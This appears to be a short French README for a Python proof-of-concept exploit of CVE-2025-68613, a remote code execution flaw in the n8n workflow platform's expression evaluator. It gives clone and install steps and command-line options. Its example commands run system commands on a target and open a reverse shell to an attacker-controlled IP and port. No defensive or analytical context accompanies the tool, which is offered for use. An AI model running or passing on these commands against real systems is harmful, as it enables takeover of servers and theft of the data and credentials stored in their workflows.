
Exploit Python pour CVE-2025-68613.
Preuve de concept (PoC) d'exploitation d'une vulnérabilité critique d'exécution de code à distance dans la plateforme d'automatisation de workflows n8n.
La vulnérabilité réside dans le système d'évaluation des expressions de n8n. Les expressions fournies par l'utilisateur ne sont pas correctement isolées (sandbox), ce qui permet à des attaquants authentifiés d'exécuter du code arbitraire sur le système hôte.
Identifiant CVE : CVE-2025-68613
Type de vulnérabilité : Exécution de code à distance (RCE)
Composant : Évaluateur d'expressions
git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt
python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]
-t, --target : URL cible (p. ex. http://localhost:5678)-u, --username : Adresse e-mail du compte n8n-p, --password : Mot de passe du compte n8n-c, --cmd : Commande système à exécuter--reverse-shell : Déclencher un reverse shell (Format : IP PORT)python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" -c "id"
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" --reverse-shell 192.168.1.100 4444